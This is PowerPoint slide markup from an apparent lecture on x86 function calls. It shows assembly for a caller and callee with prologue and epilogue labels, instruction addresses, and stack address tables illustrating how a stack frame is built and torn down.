              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>  call </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>callee</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent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en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>mov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>%eax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>,-0x4(</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a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>mov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> -0x4(</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a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>),</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eax</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx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leave</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>  ret</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="5" name="Group 4"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm flipH="1">
            <a:off x="3654189" y="3265291"/>
            <a:ext cx="1756527" cy="830903"/>
            <a:chOff x="5206736" y="118804"/>
            <a:chExt cx="1756527" cy="5909348"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="7" name="Right Bracket 6"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5206736" y="118804"/>
              <a:ext cx="763571" cy="5909348"/>
            </a:xfrm>
            <a:prstGeom prst="rightBracket">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="76200">
              <a:solidFill>
                <a:schemeClr val="accent3"/>
              </a:solidFill>
              <a:headEnd type="none"/>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w="0"/>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="19050" dir="2700000" algn="tl" rotWithShape="0">
                    <a:schemeClr val="dk1">
                      <a:alpha val="40000"/>
                    </a:schemeClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="8" name="TextBox 7"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5588522" y="1927879"/>
              <a:ext cx="1374741" cy="3353983"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" sz="1400" dirty="0">
                  <a:latin typeface="Consolas" charset="0"/>
                  <a:ea typeface="Consolas" charset="0"/>
                  <a:cs typeface="Consolas" charset="0"/>
                </a:rPr>
                <a:t>prologue</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="9" name="Group 8"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm flipH="1">
            <a:off x="3654189" y="5659908"/>
            <a:ext cx="1756527" cy="709842"/>
            <a:chOff x="5206736" y="118804"/>
            <a:chExt cx="1756527" cy="6881075"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10" name="Right Bracket 9"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5206736" y="118804"/>
              <a:ext cx="763571" cy="5909348"/>
            </a:xfrm>
            <a:prstGeom prst="rightBracket">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="76200">
              <a:solidFill>
                <a:schemeClr val="accent3"/>
              </a:solidFill>
              <a:headEnd type="none"/>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w="0"/>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="19050" dir="2700000" algn="tl" rotWithShape="0">
                    <a:schemeClr val="dk1">
                      <a:alpha val="40000"/>
                    </a:schemeClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11" name="TextBox 10"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5588522" y="1927883"/>
              <a:ext cx="1374741" cy="5071996"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" sz="1400" dirty="0">
                  <a:latin typeface="Consolas" charset="0"/>
                  <a:ea typeface="Consolas" charset="0"/>
                  <a:cs typeface="Consolas" charset="0"/>
                </a:rPr>
                <a:t>epilogue</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="12" name="Group 11"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm flipH="1">
            <a:off x="3654189" y="506830"/>
            <a:ext cx="1756527" cy="576903"/>
            <a:chOff x="5206736" y="118804"/>
            <a:chExt cx="1756527" cy="5909348"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="13" name="Right Bracket 12"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5206736" y="118804"/>
              <a:ext cx="763571" cy="5909348"/>
            </a:xfrm>
            <a:prstGeom prst="rightBracket">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="76200">
              <a:solidFill>
                <a:schemeClr val="accent3"/>
              </a:solidFill>
              <a:headEnd type="none"/>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w="0"/>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="19050" dir="2700000" algn="tl" rotWithShape="0">
                    <a:schemeClr val="dk1">
                      <a:alpha val="40000"/>
                    </a:schemeClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="14" name="TextBox 13"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5588522" y="1927879"/>
              <a:ext cx="1374741" cy="3353983"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" sz="1400" dirty="0">
                  <a:latin typeface="Consolas" charset="0"/>
                  <a:ea typeface="Consolas" charset="0"/>
                  <a:cs typeface="Consolas" charset="0"/>
                </a:rPr>
                <a:t>prologue</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="15" name="Group 14"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm flipH="1">
            <a:off x="3654189" y="2366075"/>
            <a:ext cx="1756527" cy="633380"/>
            <a:chOff x="5206736" y="118804"/>
            <a:chExt cx="1756527" cy="6881075"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="16" name="Right Bracket 15"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5206736" y="118804"/>
              <a:ext cx="763571" cy="5909348"/>
            </a:xfrm>
            <a:prstGeom prst="rightBracket">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="76200">
              <a:solidFill>
                <a:schemeClr val="accent3"/>
              </a:solidFill>
              <a:headEnd type="none"/>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w="0"/>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="19050" dir="2700000" algn="tl" rotWithShape="0">
                    <a:schemeClr val="dk1">
                      <a:alpha val="40000"/>
                    </a:schemeClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="17" name="TextBox 16"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5588522" y="1927883"/>
              <a:ext cx="1374741" cy="5071996"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" sz="1400" dirty="0">
                  <a:latin typeface="Consolas" charset="0"/>
                  <a:ea typeface="Consolas" charset="0"/>
                  <a:cs typeface="Consolas" charset="0"/>
                </a:rPr>
                <a:t>epilogue</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="15233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
                                            <p:txEl>
                                              <p:pRg st="17" end="17"/>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
                                            <p:txEl>
                                              <p:pRg st="18" end="18"/>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
                                            <p:txEl>
                                              <p:pRg st="19" end="19"/>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12"/>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extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20000"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>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2"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="344473">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:endParaRPr lang="en-US" dirty="0">
                        <a:latin typeface="Consolas" charset="0"/>
                        <a:ea typeface="Consolas" charset="0"/>
                        <a:cs typeface="Consolas" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10003"/>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5"/>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6"/>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7"/>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8"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="344473">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:endParaRPr lang="en-US" dirty="0">
                        <a:latin typeface="Consolas" charset="0"/>
                        <a:ea typeface="Consolas" charset="0"/>
                        <a:cs typeface="Consolas" charset="0"/>
                      </a:endParaRPr>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99</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Right Arrow 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="77571" y="261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0xFFFFFFFF</a:t>
            </a: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0x00000000</a:t>
            </a:r>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a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0xfd2d4</a:t>
            </a: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extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20000"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1848080">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20001"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>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0"/>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extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10001"/>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0xfd2d4</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10002"/>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a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0xfd2c0</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10003"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="378584">
                <a:tc>
                  <a:txBody>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a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0x80483a5</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0">
                        <a:latin typeface="Consolas" charset="0"/>
                        <a:ea typeface="Consolas" charset="0"/>
                        <a:cs typeface="Consolas" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10004"/>
                  </a:ext>
                </a:extLst>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a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>callee</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 (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>%edx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,1),</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add $0x1,</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$0x28,0x4(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$0xa,(</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0x8048394</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x8048395</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x8048397</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x804839a</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x804839d</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x80483a0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x80483a3</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="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0x80483a5</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x80483a6</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x80483a8</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x80483ab</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x80483b3</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x80483ba</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x80483bf</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x80483c2</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x80483c5</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x80483c6</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" b="1" dirty="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="Right Arrow 17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4562084" y="305096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Rectangle 11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1991529" y="5377554"/>
            <a:ext cx="1652954"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991529" y="6125240"/>
            <a:ext cx="1652954"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991529" y="5727526"/>
            <a:ext cx="1652954"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132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xEl>
                                              <p:pRg st="14" end="1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xEl>
                                              <p:pRg st="15" end="1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
                                            <p:txEl>
                                              <p:pRg st="16" end="1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7">
                                            <p:txEl>
                                              <p:pRg st="17" end="1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
                                            <p:txEl>
                                              <p:pRg st="18" end="18"/>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7">
                                            <p:txEl>
                                              <p:pRg st="19" end="1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
                                            <p:txEl>
                                              <p:pRg st="22" end="22"/>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7">
                                            <p:txEl>
                                              <p:pRg st="23" end="23"/>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7">
                                            <p:txEl>
                                              <p:pRg st="24" end="24"/>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7">
                                            <p:txEl>
                                              <p:pRg st="25" end="25"/>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7">
                                            <p:txEl>
                                              <p:pRg st="26" end="26"/>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7">
                                            <p:txEl>
                                              <p:pRg st="27" end="27"/>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7">
                                            <p:txEl>
                                              <p:pRg st="28" end="28"/>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7">
                                            <p:txEl>
                                              <p:pRg st="29" end="29"/>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7">
                                            <p:txEl>
                                              <p:pRg st="31" end="31"/>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7">
                                            <p:txEl>
                                              <p:pRg st="32" end="32"/>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7">
                                            <p:txEl>
                                              <p:pRg st="33" end="33"/>
                                            </p:txEl>
                                          </p:spTgt>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7">
                                            <p:txEl>
                                              <p:pRg st="34" end="34"/>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7">
                                            <p:txEl>
                                              <p:pRg st="35" end="35"/>
                                            </p:txEl>
                                          </p:spTgt>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7">
                                            <p:txEl>
                                              <p:pRg st="36" end="36"/>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7">
                                            <p:txEl>
                                              <p:pRg st="37" end="37"/>
                                            </p:txEl>
                                          </p:spTgt>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7">
                                            <p:txEl>
                                              <p:pRg st="38" end="38"/>
                                            </p:txEl>
                                          </p:spTgt>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7">
                                            <p:txEl>
                                              <p:pRg st="39" end="39"/>
                                            </p:txEl>
                                          </p:spTgt>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7">
                                            <p:txEl>
                                              <p:pRg st="40" end="40"/>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11"/>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6"/>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9"/>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grpId="0" nodeType="clickEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="114" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="12"/>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8"/>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grpId="0" nodeType="clickEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="122" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="14"/>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 presetClass="exit" presetSubtype="0" fill="hold" grpId="0" nodeType="clickEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="126"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8" grpId="0" animBg="1"/>
